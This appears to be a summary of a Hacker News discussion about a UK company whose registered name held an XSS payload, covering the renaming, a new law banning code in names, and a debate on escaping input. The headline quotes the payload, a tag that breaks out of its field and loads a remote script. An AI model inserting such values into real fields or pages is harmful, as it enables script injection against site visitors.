Company named "><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD" forced to change it (2020)

Original Article ↗ Hacker News Discussion ↗

Company name, masking, and legal changes

  • Original company with an HTML <script> tag in its name was later renamed to “THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD” and then dissolved.
  • Historical records now show a placeholder: [NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE], which replaces the actual prior name everywhere, including postal mail, making official letters confusing.
  • New UK law now forbids registering a company with a name that, in the Secretary of State’s opinion, “consists of or includes computer code.”

Security concerns & data consumers

  • Concern that this indicates XSS/sanitization problems, either in Companies House or in third-party consumers of its data.
  • Some argue the main risk is for downstream users who embed company names in web pages without escaping.
  • Others say the official site itself is “fine”, but many external users “don’t parse it properly.”

Debate: banning ‘code’ vs fixing software

  • One side: blocking such names is pragmatic “defense in depth,” given many real-world systems are fragile; easier to constrain input than secure every consumer.
  • Other side: this normalizes bad practices; systems should handle arbitrary text safely. Banning “code-like” strings is seen as a superficial fix that doesn’t solve injection issues.
  • Some propose official “honeypot” names containing benign code to force consumers to be robust. Others object that registries shouldn’t intentionally ship weaponized test inputs.

Related exploits and humorous abuses

  • Many examples of SQL/XSS-style names: car license plates (“NULL”), personal names (“Little Bobby Tables”-style), Polish companies with DROP TABLE in names.
  • Anecdotes of barcodes/QR codes triggering antivirus via the EICAR test string, and early-web promotions or auction systems being broken by script-like usernames.

Company registration & bureaucracy

  • UK company formation described as cheap and fast, though fees have risen.
  • Non-residents can register UK companies using a local mailing address; dormant companies mainly incur small annual filing costs.

Law, ambiguity, and human judgment

  • Discussion that law is intentionally not a regex: it defers to human judgment (“in the opinion of the Secretary of State”) rather than fully formal rules.
  • Long subthread on law vs code, ambiguity, precedent, and how imprecise legal language is both necessary and abusable.

Technical tangents

  • RSS vs Atom: ambiguity over whether <title> should be treated as HTML or plaintext caused feeds/readers to mangle the article title with <script> in it.
  • Broader reflection that correctly handling arbitrary strings, escaping, and encodings remains surprisingly error-prone in practice.